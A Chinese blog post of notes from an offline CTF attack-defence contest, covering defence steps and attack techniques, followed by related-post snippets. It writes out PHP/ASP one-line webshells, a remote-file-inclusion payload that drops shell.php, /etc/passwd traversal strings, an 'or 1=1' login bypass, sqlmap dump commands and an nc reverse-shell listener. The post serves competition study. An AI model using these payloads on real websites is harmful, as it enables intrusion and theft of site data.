CTF線下賽AWD總結
AWD
記錄一下自己最近參加的線下攻防比賽,沒時間學習了,就準備了幾天,果然不出意外的被安全專業的大佬打得很慘。
缺點是不會攻擊,我和我隊友兩個人就只有防,AWD防了400分,綜合滲透拿了200分。
感覺自己的知識欠差很多,程式碼審計能力弱,寫指令碼能力弱,sql注入我一直學不會。最重要的是比賽前沒有真正練習過,所以比賽時才沒把技能發揮出來。謹記:多實踐,學好程式碼審計,sql注入,手動寫指令碼!!
比完賽才對這兩種比賽模式有了清晰的瞭解。
AWD就是每隊有自己要維護的幾臺linux靶機,為低許可權或者www許可權,對自己的網站進行防守,對他人進行攻擊。
綜合滲透分外網,內網,專網,需要先滲透外網,在讓外網作為跳板機訪問內網,專網。
給了兩個靶機是永恆之藍漏洞,但比賽時沒想到,就沒法做,還有一臺直接ssh登陸,就有幾個flag。
比賽特別好,服務特別好,邊打比賽,還有水果吃,住的賓館,伙食很棒。對這次比賽滿意,也漲了很多經驗,督促自己如何去學習。下面是比賽時的原始碼。內附很多比賽之前看的網站,
一、ssh登陸,修改密碼超級複雜,mobaxterm,xshell。
普通使用者提權成root,根據kernel版本號找到對應的poc,exp提權。
二、下載原始碼,備份,/var/www/html 目錄,mobaxterm,winscp,xftp等。
三、預留後門,御劍,k8飛刀,D盾,掃描目錄,發現後門,註釋程式碼。
四、修改資料庫密碼,
> mysql -u root -p
Show databases;
use mysql;
set password for [email protected] = password('123'); 或者
update user set password = PASSWORD('要更換的密碼') where user = 'root';
flush privileges;
show tables;可能有flag。
select * from typecho_flag;
五、關閉不必要的埠,要求的服務埠不能關,
netstat -napt
kill -9 PID 殺掉程序
nmap -sV ip地址(-sV引數可以探測目標主機的伺服器版本)
nmap掃描對方開啟的埠,21,22,21,3306,進行爆破,msfconsole進入metasploit ,,,
六、程式碼審計 seay原始碼審計好用,
常見漏洞:一句話木馬,SQL注入、檔案包含、檔案上傳,越權訪問,命令執行。
- 一句話木馬
防:vim自己的網站php檔案,註釋掉一句話木馬,
<?php @eval($_REQUEST['c']); ?> <?php @eval($_POST['c']); ?>
asp的一句話是:<%eval request("xx")%>
沒有限制檔案上傳型別,允許後門上傳
攻:菜刀連線一句話木馬所在php的網站路徑,輸入密碼,即可進入到後臺,獲取網站目錄,進而上傳大馬,獲取最高許可權webshell。
沒有的話,自行網站檔案上傳一句話木馬,對檔案型別有限制的話需要BurpSuite抓包,修改content type image/php,根據返回的路徑,連線菜刀。
許可權維持:1.不死馬, 2. nc反彈shell nc -lp 9999
- SQL注入漏洞
(1)使用者登入,輸入’測試存在sql注入點,萬能密碼 ' or 1='1 弱密碼 admin/admin 火狐外掛hackbar
select name,pass from tbAdmin where name='' or 1='1' and pass='123456'
(2)啊D掃描網站sql注入點,sqlmap注入,
比賽時Access資料庫注入點:
sqlmap -u "url" 檢視系統,版本
sqlmap -u "url" --dbs 爆資料庫
sqlmap -u "url" --tables -D ctf 爆表
sqlmap -u "url" --column -D ctf -T users 爆列
sqlmap -u "url" --dump -D ctf -T users "user_name,user_pass" 爆欄位
網站資料庫密碼資訊檔案一般放在config.php中。
3.檔案包含
(1)本地檔案包含
localhost/a.php?file=/flag.txt
(2)遠端檔案包含
localhost/a.php?file=http:ip/echo.txt
利用,上傳一句話木馬
echo.txt 檔案內容,會生成shell.php 內容為一句話木馬。
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xx]);?>");?>
常見的檔案包含函式,include(),include_once(),require(),require_once()
幾種經典的測試方法:
?file=../../../../../etc/passwd 長目錄截斷
?page=file:///etc/passwd 讀取敏感檔案
?home=main.cgi
?page=http://www.a.com/1.php
4.越權訪問 allow_url_fopen =ON, allow_url_include =ON
水平越權:修改id,訪問他人
垂直越權:知道管理後臺的url,通過訪問,提升許可權,獲取資料。
/admin/upload/config.php 越權訪問,無需登陸,直接顯示
- 命令執行漏洞
直接呼叫作業系統命令,常見php函式system,exec,shell_exec
七、網站防禦
上WAF,檔案監控,安全狗,
在檔案頭寫上,require_once(‘waf.php’);
八、日誌分析,根據自己攻擊payload去攻擊他人。
寫指令碼批量拿flag。
綜合靶場
Nmap掃描靶機,檢視系統,metasploit 漏洞利用,根據相應的系統核心漏洞,提權,
獲取後臺密碼,登入後臺,根目錄下flag
建立新使用者,新增到管理員組,遠端目標靶機。
可能存在flag的位置:
- 御劍掃描,雙擊網頁開啟,存在flag。
- ssh登陸,系統根目錄下,/var/www/html下
- mysql資料庫欄位中。
- 遠端主機桌面,資料夾下。
==================網站合集====================
=============================
相關推薦
CTF線下賽AWD總結
AWD 記錄一下自己最近參加的線下攻防比賽,沒時間學習了,就準備了幾天,果然不出意外的被安全專業的大佬打得很慘。 缺點是不會攻擊,我和我隊友兩個人就只有防,AWD防了400分,綜合滲透拿了200分。 感覺自己的知識欠差很多,程式碼審計能力弱,寫指令碼能力弱,
CTF線下賽AWD模式下的生存技巧
scan 經驗 payload attack flag 時也 兩個 版本 ebs 作者:Veneno@Nu1L 稿費:200RMB 投稿方式:發送郵件至linwei#360.cn,或登陸網頁版在線投稿 原文:https://www.anquanke.com/p
CTF-線下AWD必備PHP大馬
分享幾個php大馬 <?php $GLOBALS['pass'] = "6d31b7d21395a26b8035fdd7b94bb070d5993de3";$func="cr"/*-/-*/."eat"./*-/-*/"e_fun"/*-/-*/."cti"/*
賽博地球杯線下賽WEB_RCE Write_up
這次參與賽博地球杯線下賽出題,看到巨佬們強還是強啊,先膜一下,然後獻上自己的出題思路,萌新出題,輕噴 !!! 第一步、登入 檢視網站發現網站無法登入,並且根據robots.txt能發現hint.php和hack.php 不過可以注意到cookie中
2018 ACM-ICPC 寧夏邀請賽線下賽
通過網路賽獲取了參加線下賽的資格,上大學以來第一次跑這麼遠打比賽=v= 9號凌晨抵達銀川火車站,校方安排好了接送車輛直接送去賓館。 到賓館就已經一點多了,直接洗洗睡了。 10號早晨在酒店吃完早餐就打車到寧夏理工學院集合。真滴秀,一個學校佔了一個島_(
CTF奪旗賽經驗總結及落地實踐
中國是科技人才資源最多的國家之一,但也是人才流失比較嚴重的國家。世界各國已經把加強人才建設作為搶佔網路空間制高點的戰略舉措。在此背景下,國內外各類CTF比賽越來越多,那麼怎樣一方面才能準備好比賽,另一方面又怎樣才能組織好比賽,小編請兩位專家來聊聊。 什麼是CTF奪旗賽 C
ISCC2018線下賽河南賽區的一道Reverse題writeup
0x01:先執行一下 發現GetFlag按鈕是灰色的 輸入無反應 直接用灰色按鈕剋星啟用(spy++也行) 點選後出現假的flag(當時還傻傻提交好多次。。。) 0x02:PEiD
linux下can總線移植及測試總結
哪裏 ips sub 開關 switch 發現 開發 主機 編譯工具 Can移植及測試總結 Adding Flexcan driver support on Kernel 一.On kernel menuconfig, add the following items: [*
AWD 線下攻防生存之道(Web 方向)
隨著網路安全的熱門,CTF 比賽也如春筍般崛起。AWD 無疑使 CTF 比賽中最有趣的環節。本 Chat 講會講解 AWD 線下比賽中的攻防之道,帶你快速的入門 AWD 攻防,體會“HACKER”在網路世界中廝殺的樂趣。 本 Chat 將會從以下幾個方向去討論: AWD 比賽的快速上手;
i春秋線下培訓 ctf比賽關卡
第一關 tobot 訪問目標連結 只得到一張圖片 還以為是一些老套路 抓包 儲存圖片 以各種形式開啟 並沒有得到什麼資訊 突然想到robots.txt 訪問 得到如下資訊 訪問其目錄
HttpClient在多線程環境下踩坑總結
批量 detail 地址 3.1 nop true jmap命令 mux -c 問題現場 在多線程環境下使用HttpClient組件對某個HTTP服務發起請求,運行一段時間之後發現客戶端主機CPU利用率呈現出下降趨勢,而不是一個穩定的狀態。 而且,從程序日誌中判斷有線程處於
參加湛江新教育群線下活動有感
content 價值 ont .html nba 大學 log blank 毫無 緣起 一直關註教育,從大學到小學。所以一個朋友向我推薦了新教育——今日學堂。以及昨晚(2014.06.13)的湛江新教育群在赤坎的線下活動。感受最深的是看到有那麽幾個家長。真正在憂
多進程間通信方式和多線程同步機制總結
post msd 阻塞 ng- div 文件映射 管理 線程 -m 多進程之間通信方式: 文件映射:本地之間 共享內存:本地之間 匿名管道:本地之間 命名管道:跨服務器 郵
小豬CMS線下沙龍完美閉幕,開啟合作共贏新征程!
小豬CMS 線下沙龍 小豬CMS線下沙龍完美閉幕,開啟合作共贏新征程! 2017年6月13日,小豬CMS線下沙龍交流會在中國·合肥隆重召開。來自全國各地的互聯網創業者、小豬智慧店鋪代理商客戶們濟濟一堂,共同學習和探討移動互聯網趨勢下,行業如何實現經營模式轉型、高效開展業務,以及門店如何快速
Java多線程編程總結
接口實現 thread 資源 模式 ext rand tid 應用程序 線程間的通信 Java線程:概念與原理 Java線程:創建與啟動 Java線程:線程棧模型與線程的變量 Java線程:線程狀態的轉換 Java線程:線程的同步與鎖 Java線程:線程的交互 Java
支付寶線下支付商家 開通微信支付寶商家簽約資料
二維碼支付代理 支付寶線下支付商家 付寶支付代理 微信支付寶商家簽約資料杭州合言信息科技有限公司-專註移動支付領域,二維碼支付代理,支付寶線下支付商家,支付寶支付代理,主要是服務於商戶,商戶和其一次對接之後,能同時支持微信支付,支付寶支付,百度錢包等多個支付渠道,包括支持多種第三方支付平臺、合作銀行及其他服務
支付寶線下收單招商加盟 代理商盈利分析
支付寶線下收單 代理商盈利 支付寶招商加盟 杭州合言信息科技有公司,是支付寶渠道商授權的北京地區一級代理商,現誠招全國各區代理,支付寶加盟合作,線下收單高分潤。“低”門檻,公司執行“一對一支持政策”,任何加盟代理費,全程技術支持,低價提供收單終端設備,並且提供各行業營銷方案,我們的合作
微信小程序平臺化開發案例,公開多商家門店線下盈利模式
運營 實例 images .cn 技術分享 盈利 後臺管理系統 線下 招募 小程序商圈平臺、多商家/門店入駐、開發管理後臺(實例分析) 咫尺網絡 出品 1、小程序“商圈平臺”開發設計源碼小程序平臺化經營,占據商圈流量高點,對外招募商家門店(多樣化盈利模式),打造人氣
微信小程序怎麽用?線下商家最適合玩小程序
align 客戶 特點 商業 很好 p s 產生 零售業 要素 隨著微信小程序不斷地釋放新功能,許多行業越來越關註小程序,目前已經有不少餐飲和線下傳統零售企業開始謀劃利用好小程序。但是,線下商業有著復雜的場景,如何針對自己行業的特點和需求開發出屬於自己的小程序,是擺在商家面
從線下走到線上,藝術品能否找到新突破口?
資源 公司 關系 授權 市場 相對 嚴重 年輕 廣泛 藝術品因其具有的收藏價值、文化價值、觀賞價值以及不可復制性,讓收藏者願不遠萬裏前去赴約,許以千金只求抱得珍品歸。中國作為有五千年悠久歷史的古國之一,前人留下的傳世藝術品不計其數,藝術品交易需求不小,但是傳統的線下藝術品